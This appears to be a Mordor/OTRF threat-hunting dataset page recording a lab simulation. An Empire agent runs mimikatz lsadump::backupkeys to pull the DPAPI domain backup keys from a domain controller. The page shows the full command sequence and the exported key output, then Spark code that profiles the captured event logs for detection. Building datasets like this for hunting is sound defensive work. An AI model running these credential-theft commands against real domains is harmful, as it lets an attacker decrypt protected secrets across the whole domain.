Empire Mimikatz Backup Keys

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/21

Tactics

[‘TA0006’]

Techniques

[‘T1003’]

Tags

[‘DPAPI’, ‘DPAPI Domain Backup key’, ‘RPC LSARPC’]

Dataset Description

This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Threat Hunter Playbook

Domain DPAPI Backup Key Extraction

https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

mimikatz_lsadump_backupkeys

Adversary View

(Empire: GCSKD17Z) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
GCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         1112   5/0.0    2020-09-22 06:44:20  http            

(Empire: agents) > interact GCSKD17Z
(Empire: GCSKD17Z) > usemodule credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export
(Empire: powershell/credentials/mimikatz/command) > execute
[*] Tasked GCSKD17Z to run TASK_CMD_JOB
[*] Agent GCSKD17Z tasked with task ID 9
[*] Tasked agent GCSKD17Z to run module powershell/credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > 
Job started: WY91NL

Hostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export

Current prefered key:       {b7638eb2-c641-40da-ac1c-f79d705bbc34}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   : 
        |Implementation: CRYPT_IMPL_SOFTWARE ; 
        Algorithm      : CALG_RSA_KEYX
        Key size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key : YES
        Private export : OK - 'ntds_capi_0_b7638eb2-c641-40da-ac1c-f79d705bbc34.keyx.rsa.pvk'
        PFX container  : OK - 'ntds_capi_0_b7638eb2-c641-40da-ac1c-f79d705bbc34.pfx'
        Export         : OK - 'ntds_capi_0_b7638eb2-c641-40da-ac1c-f79d705bbc34.der'

Compatibility prefered key: {74562e44-6689-4ede-9c63-1fc80a4efb16}
  * Legacy key
62120aa3174a8809ca95bd9369e8d5d062783e1c851c4cb4e9fd30db992a2a74
7be846fe31ba50f4595afab3b487697dfaeec151652b27ea2fec86ac89903680
1bacbf6392c94c986714efc09bbdd09b9bd0b4dfb8ccfb9a8eb946d8dbeb58d9
38244dc055bd85b32b47fdc180baca8f69d8944b5ae000f2353a0f5ef96e0797
4525d57e27895e40d495ab0956f3349a066069681943b426854e885393ddc871
2d9a9d21f60f2929bdf0bf52131291dad835c512a537b98b2738483203c96334
b79fc1f61ff6a92761eaee2a44f915f2514d8974e30ce8ef0d8f40038bbfd1b5
1c89035623e2a66c9858ffcade5a3300f2fbc5678da7ae9011c328304e4f440d

        Export         : OK - 'ntds_legacy_0_74562e44-6689-4ede-9c63-1fc80a4efb16.key'

(Empire: powershell/credentials/mimikatz/command) > 

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |3978 |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |3965 |
|MORDORDC.theshire.local    |Security                                |4658   |1049 |
|MORDORDC.theshire.local    |Security                                |4656   |525  |
|MORDORDC.theshire.local    |Security                                |4690   |525  |
|MORDORDC.theshire.local    |Security                                |4663   |508  |
|MORDORDC.theshire.local    |Windows PowerShell                      |800    |273  |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4103   |273  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |233  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |131  |
|MORDORDC.theshire.local    |Security                                |4703   |96   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |76   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |67   |
|MORDORDC.theshire.local    |Security                                |4634   |53   |
|MORDORDC.theshire.local    |Security                                |5156   |36   |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4104   |34   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |34   |
|WORKSTATION6.theshire.local|security                                |5158   |30   |
|WORKSTATION5.theshire.local|security                                |5158   |28   |
|MORDORDC.theshire.local    |Security                                |4624   |28   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows